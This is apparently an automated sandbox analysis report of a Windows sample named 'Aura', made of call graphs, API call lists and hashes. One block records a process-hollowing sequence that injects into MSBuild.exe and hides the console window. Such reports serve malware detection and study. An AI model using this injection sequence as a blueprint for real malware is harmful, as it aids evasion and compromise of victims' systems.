22687->22689 22690 ba979 22688->22690 22692 b3790 _Fputc 39 API calls 22688->22692 22689->22699 22693 ba993 22690->22693 22694 ba9b1 22690->22694 22691 aa6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22695 babb4 22691->22695 22692->22690 22709 c66fb 22693->22709 22697 bab41 22694->22697 22698 ba9c5 22694->22698 22695->22661 22697->22699 22700 bc021 _Fputc WideCharToMultiByte 22697->22700 22698->22699 22701 baa5f 22698->22701 22705 baa09 22698->22705 22699->22691 22700->22699 22702 bc021 _Fputc WideCharToMultiByte 22701->22702 22703 baa72 22702->22703 22703->22699 22706 baa8b GetLastError 22703->22706 22704 bc021 _Fputc WideCharToMultiByte 22704->22699 22705->22704 22706->22699 22707 baa9a 22706->22707 22707->22699 22708 bc021 _Fputc WideCharToMultiByte 22707->22708 22708->22707 22712 c6732 std::_Locinfo::_Locinfo_dtor codecvt 22709->22712 22710 aa6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22711 c6808 22710->22711 22711->22699 22712->22710 22714 a1283 std::ios_base::_Ios_base_dtor codecvt _strlen 22713->22714 22724 a1402 22713->22724 22715 a1422 22714->22715 22717 a142e 22714->22717 22718 aa663 RaiseException EnterCriticalSection LeaveCriticalSection codecvt 22714->22718 22722 a1000 102 API calls 22714->22722 22714->22724 22716 a2600 std::_Throw_Cpp_error 30 API calls 22715->22716 22716->22717 22719 b7ddf std::_Throw_Cpp_error 29 API calls 22717->22719 22718->22714 22720 a1433 22719->22720 22721 a1460 std::_Throw_Cpp_error 29 API calls 22720->22721 22723 a144f 22721->22723 22722->22714 22723->22664 22724->22664 22726 a1240 102 API calls 22725->22726 22727 a1f18 FreeConsole 22726->22727 22744 a14b0 22727->22744 22729 a1f39 22730 a14b0 103 API calls 22729->22730 22731 a1f4a 22730->22731 22732 a1240 102 API calls 22731->22732 22733 a1f5d VirtualProtect 22732->22733 22735 a1f7e 22733->22735 22736 aa6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22735->22736 22737 a1fa3 22736->22737 22737->22674 22739 a1013 22738->22739 22754 a2750 22739->22754 22748 a14f0 22744->22748 22745 a4320 30 API calls 22745->22748 22746 a1750 103 API calls 22746->22748 22747 a1d10 75 API calls 22747->22748 22748->22745 22748->22746 22748->22747 22749 a1702 std::ios_base::_Ios_base_dtor 22748->22749 22750 a16dd 22748->22750 22749->22729 22750->22749 22751 b7ddf std::_Throw_Cpp_error 29 API calls 22750->22751 22752 a1725 22751->22752 22753 a1ea0 29 API calls 22752->22753 22755 a27ae 22754->22755 22756 a2c50 39 API calls 22755->22756 22760 a27fa 22755->22760 22764 a27d1 22755->22764 22756->22760 22757 a2f00 std::ios_base::_Init 38 API calls 22757->22764 22758 a29de 22761 a1028 22758->22761 22762 a38e0 39 API calls 22758->22762 22759 a32c0 std::ios_base::_Init 30 API calls 22759->22764 22760->22764 22774 acfb0 22760->22774 22766 a1110 22761->22766 22762->22761 22763 b060c Concurrency::cancel_current_task RaiseException 22763->22764 22764->22757 22764->22758 22764->22759 22764->22763 22767 a115c 22766->22767 22778 a3c70 22767->22778 22772 a2c50 39 API calls 22773 a1031 22772->22773 22773->22684 22775 acfbf 22774->22775 22776 acfd2 codecvt 22774->22776 22775->22764 22776->22775 22777 b932d 69 API calls 22776->22777 22777->22775 22779 aa9f4 std::_Lockit::_Lockit 7 API calls 22778->22779 22780 a3caa 22779->22780 22781 aa9f4 std::_Lockit::_Lockit 7 API calls 22780->22781 22785 a3ce5 22780->22785 22782 a3cc4 22781->22782 22787 aaa25 std::_Lockit::~_Lockit 2 API calls 22782->22787 22783 a3daf 22784 aaa25 std::_Lockit::~_Lockit 2 API calls 22783->22784 22786 a1170 22784->22786 22785->22783 22788 aa663 codecvt 3 API calls 22785->22788 22797 a3a00 22786->22797 22787->22785 22789 a3d4a 22788->22789 22790 a3e90 codecvt 67 API calls 22789->22790 22791 a3d7c 22790->22791 22792 aecbf __Getctype 39 API calls 22791->22792 22793 a3d97 22792->22793 22794 a4010 codecvt 65 API calls 22793->22794 22795 a3da2 22794->22795 22796 aab43 RaiseException 22795->22796 22796->22783 22798 a3a3f 22797->22798 22800 a2c50 39 API calls 22798->22800 22801 a3a5f 22798->22801 22802 a3a85 22798->22802 22799 a2f00 std::ios_base::_Init 38 API calls 22799->22801 22800->22802 22801->22799 22803 a32c0 std::ios_base::_Init 30 API calls 22801->22803 22804 a3b2d 22801->22804 22807 b060c Concurrency::cancel_current_task RaiseException 22801->22807 22802->22801 22811 acb22 22802->22811 22823 acb32 22802->22823 22836 acb40 22802->22836 22803->22801 22805 a11e4 22804->22805 22806 a38e0 39 API calls 22804->22806 22805->22772 22806->22805 22807->22801 22812 acb29 22811->22812 22818 acb75 22811->22818 22848 b3315 EnterCriticalSection 22812->22848 22814 acb2e 22814->22801 22815 acb79 22816 aa6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22815->22816 22817 acc48 22816->22817 22817->22801 22818->22815 22820 acc09 22818->22820 22821 acba9 22818->22821 22820->22815 22822 b932d 69 API calls 22820->22822 22821->22815 22845 ac44d 22821->22845 22822->22815 22824 acb39 22823->22824 22825 acb85 22823->22825 22873 b3329 LeaveCriticalSection 22824->22873 22827 acb10 22825->22827 22829 acc09 22825->22829 22830 acbea 22825->22830 22827->22801 22828 acb3e 22828->22801 22831 b932d 69 API calls 22829->22831 22835 acbfb 22829->22835 22833 ac44d _Fputc 68 API calls 22830->22833 22830->22835 22831->22835 22832 aa6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22834 acc48 22832->22834 22833->22835 22834->22801 22835->22832 22839 acb63 22836->22839 22841 acb5c 22836->22841 22837 aa6e1 __ehhandler$??2@YAPAXIABUnothrow_t@std@@@Z 5 API calls 22838 acc48 22837->22838 22838->22801 22839->22841 22842 acc09 22839->22842 22843 acba9 22839->22843 22840 ac44d _Fputc 68 API calls 22840->22841 22841->22837 22842->22841 22844 b932d 69 API calls 22842->22844 22843->22840 22843->22841 22844->22841 22849 b8bfc 22845->22849 22847 ac45d 22847->22815 22848->22814 22850 b8c0f _Fputc 22849->22850 22853 b8c5d 22850->22853 22852 b8c1e _Fputc 22852->22847 22854 b8c69 ___scrt_is_nonwritable_in_current_image 22853->22854 22855 b8c72 22854->22855 22856 b8c96 22854->22856 22858 b7f78 __strnicoll 29 API calls 22855->22858 22869 b3315 EnterCriticalSection 22856->22869 22868 b8c8b _Fputc 22858->22868 22859 b8c9f 22860 b8cb4 22859->22860 22861 bf704 _Ungetc 29 API calls 22859->22861 22862 b8d51 22860->22862 22863 b8d20 22860->22863 22861->22860 22865 b8c30 _Fputc 66 API calls 22862->22865 22864 b7f78 __strnicoll 29 API calls 22863->22864 22864->22868 22866 b8d5d 22865->22866 22870 b8d89 22866->22870 22868->22852 22869->22859 22873->22828 22874 b92d7 22875 bbed7 ___free_lconv_mon 14 API calls 22874->22875 22876 b92ef 22875->22876

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,000DA110,000DA100), ref: 000DA334
                                                                                                                                                                                                                                                    • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 000DA347
                                                                                                                                                                                                                                                    • Wow64GetThreadContext.KERNEL32(00000098,00000000), ref: 000DA365
                                                                                                                                                                                                                                                    • ReadProcessMemory.KERNELBASE(0000008C,?,000DA154,00000004,00000000), ref: 000DA389
                                                                                                                                                                                                                                                    • VirtualAllocEx.KERNELBASE(0000008C,?,?,00003000,00000040), ref: 000DA3B4
                                                                                                                                                                                                                                                    • WriteProcessMemory.KERNELBASE(0000008C,00000000,?,?,00000000,?), ref: 000DA40C
                                                                                                                                                                                                                                                    • WriteProcessMemory.KERNELBASE(0000008C,00400000,?,?,00000000,?,00000028), ref: 000DA457
                                                                                                                                                                                                                                                    • WriteProcessMemory.KERNELBASE(0000008C,?,?,00000004,00000000), ref: 000DA495
                                                                                                                                                                                                                                                    • Wow64SetThreadContext.KERNEL32(00000098,02D10000), ref: 000DA4D1
                                                                                                                                                                                                                                                    • ResumeThread.KERNELBASE(00000098), ref: 000DA4E0
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
                                                                                                                                                                                                                                                    • String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
                                                                                                                                                                                                                                                    • API String ID: 2687962208-3857624555
                                                                                                                                                                                                                                                    • Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                                                                                                                                    • Instruction ID: e716e28385aa1ed2fff158c612ae8c81719369566884179bc0df9bdb8a1c46e4
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BDB1087660024AAFDB60CF68CC80BDA73A5FF89714F158125EA0CAB341D774FA51CBA4

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 72 a1fb0-a203b GetPEB call a1240 CreateFileA 76 a2228-a223a 72->76 77 a2041-a204f GetFileSize 72->77 78 a21fc-a2203 CloseHandle 77->78 79 a2055-a2073 call aa6d3 ReadFile 77->79 78->76 82 a2079-a208a CloseHandle 79->82 83 a21f3-a21f9 call aa6dc 79->83 85 a2090-a20ab 82->85 86 a2205-a220c 82->86 83->78 88 a20ba-a20d7 call b9c30 85->88 89 a2213-a2220 call a1ef0 86->89 94 a223b-a2242 call a2600 88->94 95 a20dd-a20e5 88->95 92 a2225 89->92 92->76 100 a2247-a2263 call b7ddf call a1460 94->100 96 a2110-a212c 95->96 97 a20e7-a210d call b22a0 95->97 101 a212e-a2143 call aa663 96->101 102 a2150-a215c call aa663 96->102 107 a2179-a219c call a1000 97->107 112 a215e-a2176 call b22a0 101->112 102->112 117 a21ce-a21da 107->117 118 a219e-a21aa 107->118 112->107 122 a20b0-a20b4 117->122 123 a21e0-a21ee 117->123 120 a21ac-a21b7 118->120 121 a21c4-a21cb call aa698 118->121 120->100 124 a21bd-a21c2 120->124 121->117 122->88 122->89 123->122 124->121
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                      • Part of subcall function 000A1240: _strlen.LIBCMT ref: 000A12BA
                                                                                                                                                                                                                                                    • CreateFileA.KERNELBASE ref: 000A2036
                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000), ref: 000A2046
                                                                                                                                                                                                                                                    • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 000A206B
                                                                                                                                                                                                                                                    • CloseHandle.KERNELBASE(00000000), ref: 000A207A
                                                                                                                                                                                                                                                    • _strlen.LIBCMT ref: 000A20CD
                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 000A21FD
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: File$CloseHandle_strlen$CreateReadSize
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 2911764282-0
                                                                                                                                                                                                                                                    • Opcode ID: cd08605bba17c97c02f4ffee7ffc1c09aa3a359cd49b580424996672a1f92c01
                                                                                                                                                                                                                                                    • Instruction ID: 741cd4ce61ef1e50424acaa822b5e3660d532e06d3bdefa6b709c5b59763b149
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cd08605bba17c97c02f4ffee7ffc1c09aa3a359cd49b580424996672a1f92c01
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9571B2B2D002149BDB10DFA8DC44BEEBBB5FF5A310F140629E815A7392E7359945CBA1
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                    • Opcode ID: e952df3d4b0cd19a57e27a3f94560e3ad4ce945755ba92c9b9b85cc7bf1b8e0a
                                                                                                                                                                                                                                                    • Instruction ID: 983c62eef079e73cd6297a8b4c6522dcb16c36808bf8fc768e6e82b2fbf8ecd3
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e952df3d4b0cd19a57e27a3f94560e3ad4ce945755ba92c9b9b85cc7bf1b8e0a
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09213A336141650B87AC9F786D6247BFB8ADB876A0B05573EEE129F2D1E520DE1082E4

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetConsoleWindow.KERNELBASE ref: 000A24DD
                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000000), ref: 000A24E6
                                                                                                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 000A2524
                                                                                                                                                                                                                                                      • Part of subcall function 000AF11D: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,?,?,?,000A253A,?,?,00000000), ref: 000AF129
                                                                                                                                                                                                                                                      • Part of subcall function 000AF11D: GetExitCodeThread.KERNEL32(?,00000000,?,?,000A253A,?,?,00000000), ref: 000AF142
                                                                                                                                                                                                                                                      • Part of subcall function 000AF11D: CloseHandle.KERNEL32(?,?,?,000A253A,?,?,00000000), ref: 000AF154
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 000A2567
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 000A2578
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 000A2589
                                                                                                                                                                                                                                                    • std::_Throw_Cpp_error.LIBCPMT ref: 000A259A
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: Cpp_errorThrow_std::_$ThreadWindow$CloseCodeConsoleCurrentExitHandleObjectShowSingleWait
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 3956949563-0
                                                                                                                                                                                                                                                    • Opcode ID: ee4cf8053eb688ec1644940782a1f1fe72a43c548a18bb3d36efd57b74eb7cab
                                                                                                                                                                                                                                                    • Instruction ID: 67d43a8c9f39c7f1bab155bf9b9f218932d588ba049a8978c78de756a4ffbb64
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ee4cf8053eb688ec1644940782a1f1fe72a43c548a18bb3d36efd57b74eb7cab
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 912165F2D402159BDF10AFE49C06BEE7BB4BF05710F180165F90476282E7B69614CBA6

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 51 bcf0b-bcf17 52 bcfa9-bcfac 51->52 53 bcf1c-bcf2d 52->53 54 bcfb2 52->54 56 bcf3a-bcf53 LoadLibraryExW 53->56 57 bcf2f-bcf32 53->57 55 bcfb4-bcfb8 54->55 60 bcfb9-bcfc9 56->60 61 bcf55-bcf5e GetLastError 56->61 58 bcf38 57->58 59 bcfd2-bcfd4 57->59 63 bcfa6 58->63 59->55 60->59 62 bcfcb-bcfcc FreeLibrary 60->62 64 bcf60-bcf72 call c0554 61->64 65 bcf97-bcfa4 61->65 62->59 63->52 64->65 68 bcf74-bcf86 call c0554 64->68 65->63 68->65 71 bcf88-bcf95 LoadLibraryExW 68->71 71->60 71->65
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,?,?,F7EDDA51,?,000BD01A,?,?,00000000), ref: 000BCFCC
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: FreeLibrary
                                                                                                                                                                                                                                                    • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                    • API String ID: 3664257935-537541572
                                                                                                                                                                                                                                                    • Opcode ID: 5f4c69ceb84b48d86dd9b23cacf1922ade072cb0fd00ee11a1551580ed175d37
                                                                                                                                                                                                                                                    • Instruction ID: a32cd1eeea96eecdbcc20bb540ac55849b2325970f2e4b4b415a6254c84b15b7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 5f4c69ceb84b48d86dd9b23cacf1922ade072cb0fd00ee11a1551580ed175d37
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2E21D831A02312ABEB319B65DC40FBE77AADB51760F250172FD55A7290D774ED00CAE0

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 127 a1750-a17eb call b9c30 130 a17ed-a1803 127->130 131 a1806-a180b 127->131 130->131 132 a181b-a1821 131->132 133 a180d-a1816 131->133 136 a1823-a1825 132->136 137 a1851-a1855 132->137 135 a1b69-a1b8c 133->135 140 a1b8e-a1b95 call ad748 135->140 141 a1be4-a1c48 call a2f00 call a32c0 call b060c 135->141 136->137 138 a1827-a1849 call a2c50 136->138 139 a1858-a1898 call a4460 137->139 138->135 152 a184f 138->152 164 a18ca-a18e0 139->164 165 a189a-a18b4 139->165 150 a1b9f-a1bad 140->150 151 a1b97-a1b9a call a38e0 140->151 141->135 156 a1baf-a1bce 150->156 157 a1bd1-a1be3 150->157 151->150 152->139 156->157 167 a19b9 164->167 168 a18e6-a18f5 164->168 165->164 181 a18b6-a18c6 165->181 170 a19bb-a19c1 167->170 168->170 171 a18fb 168->171 172 a19ff-a1a03 170->172 173 a1900-a1914 171->173 176 a1a09-a1a11 172->176 177 a1a92-a1a96 172->177 174 a1940-a1965 173->174 175 a1916-a191d 173->175 184 a1968-a1972 174->184 175->174 179 a191f-a192f 175->179 176->177 180 a1a13-a1a59 176->180 182 a1a9c-a1aa6 177->182 183 a1b54-a1b61 177->183 179->184 202 a1a5b-a1a62 180->202 203 a1a68-a1a89 call adef0 180->203 181->164 182->183 186 a1aac 182->186 183->135 189 a19aa-a19b2 184->189 190 a1974-a1992 184->190 187 a1ab0-a1ac4 186->187 192 a1af0-a1b1c 187->192 193 a1ac6-a1acd 187->193 196 a19b5-a19b7 189->196 190->173 195 a1998-a19a8 190->195 199 a1b1e-a1b47 192->199 204 a1b4f 192->204 193->192 197 a1acf-a1ae3 193->197 195->196 196->170 197->199 200 a1ae5 197->200 199->187 206 a1b4d 199->206 200->204 202->203 205 a19d0-a19dd 202->205 210 a1a8b-a1a8d 203->210 204->183 209 a19e0-a19fc 205->209 206->183 209->172 210->209
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675195132.00000000000E2000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675242534.000000000012E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_a0000_Aura.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _strlen
                                                                                                                                                                                                                                                    • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                                    • API String ID: 4218353326-1866435925
                                                                                                                                                                                                                                                    • Opcode ID: 9d0f66c5c13a2a67903469b1f010dc7567f990293f7a53819b632d838b715be5
                                                                                                                                                                                                                                                    • Instruction ID: be7e3b519abb51d15848899bf5d826e52b469a1aa1e5259308122c7283609bf7
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d0f66c5c13a2a67903469b1f010dc7567f990293f7a53819b632d838b715be5
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 02F15D75A012148FDB14CFA8C494BADBBF2FF89324F194269E815AB392D735AD05CF90

                                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                                    control_flow_graph 212 b5349-b5354 213 b536a-b537d call b53da 212->213 214 b5356-b5369 call b76e4 call b7dcf 212->214 220 b53ab 213->220 221 b537f-b539c CreateThread 213->221 225 b53ad-b53b9 call b542a 220->225 223 b53ba-b53bf 221->223 224 b539e-b53aa GetLastError call b770a 221->224 228 b53c1-b53c4 223->228 229 b53c6-b53ca 223->229 224->220 228->229 229->225
                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,Function_00015470,00000000,00000000,00000000), ref: 000B5392
                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,000A2513,00000000,00000000), ref: 000B539E
                                                                                                                                                                                                                                                    • __dosmaperr.LIBCMT ref: 000B53A5
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1675113327.00000000000A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675098516.00000000000A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675134376.00000000000CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675148969.00000000000DA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675161443.00000000000DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1675180565.00000000000DF000.00000002.00000001.01000000.00000003.sdmpDownload File
